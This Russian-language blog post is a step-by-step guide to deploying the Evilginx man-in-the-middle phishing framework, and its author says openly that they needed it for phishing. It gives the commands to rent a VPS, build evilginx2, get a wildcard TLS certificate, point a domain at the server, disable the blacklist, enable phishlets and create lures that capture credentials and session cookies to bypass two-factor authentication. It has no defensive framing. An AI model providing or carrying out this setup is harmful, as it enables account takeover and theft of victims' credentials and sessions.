About Teletype
Join
thoughtcrime
@infosafeness
September 4, 2024

Гайд по использованию Evilginx3

На днях у меня возникла необходимость использовании фишинга, из-за чего я занялся поиском подходящего инструмента. Исследуя различные репозитории на гитхабе, и в результате наткнулся на интересный инструмент под названием Evilginx3. Этот пакет содержит фреймворк для атак типа «человек посередине», используемый для фишинга учетных данных для входа в систему вместе с файлами cookie сеанса, что, в свою очередь, позволяет обойти двухфакторную аутентификацию. Фреймворк использует так называемые «фишлеты» для копирования легитимных веб-сайтов и обмана пользователей, заставляя их вводить свои учетные данные.

Для того, чтобы приступить к «рыбалке» необходимо приобрести доменное имя и VPS. На Digital Ocean нам нужно приобрести дроплет, там же необходимо добавить доменное имя которое вы приобрели во вкладке «домен». Приобретаем дроплет и копируем его ip адрес. Чтобы зайти в систему нужно выполнить команду для входа в систему с использованием SSH: 

ssh root@yourip

Чтобы использовать Evilginx необходимо установить язык Go, на котором он написан. Благо в сети есть уйма гайдов по его установке. 

git clone https://github.com/kgretzky/evilginx2
cd evilginx2
make
sudo make install

Теперь нам нужно установить certbot, это клиент, благодаря которому можно автоматически управлять SSL-сертификатами от Let's Encrypt.

sudo apt install certbot

создайте текстовую запись с помощью certbot:

certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.your.domen --email noreply@live.com

теперь вам нужно скопировать эту запись и перейти на вкладку домен в DO. вставьте эти значения в текстовую запись и создайте ее.

Осталось создать только «A record» и «CNAME» в своем домене, чтобы при каждом создании нового поддомена Evilginx теперь показывал вам любую ошибку.

Перед нами только настройка Evilginx, для этого добавляем доменное имя и IP-адрес внутри Evilginx.

config domain your.domen
config ip yourip
blacklist off

После настройки домена и IP-адреса, теперь вам нужно настроить шаблоны, которые вы хотите использовать для фишинга, для этого вы можете выполнить команду, приведенную ниже.

phishlets hostname *** ***
phishlets enable ***

теперь SSL-сертификаты вашего домена успешно активированы. это означает, что вы можете запускать фишинговую страницу.

lures create ***
thoughtcrime
September 4, 2024, 16:25
0 views
1 reaction
0 replies
0 reposts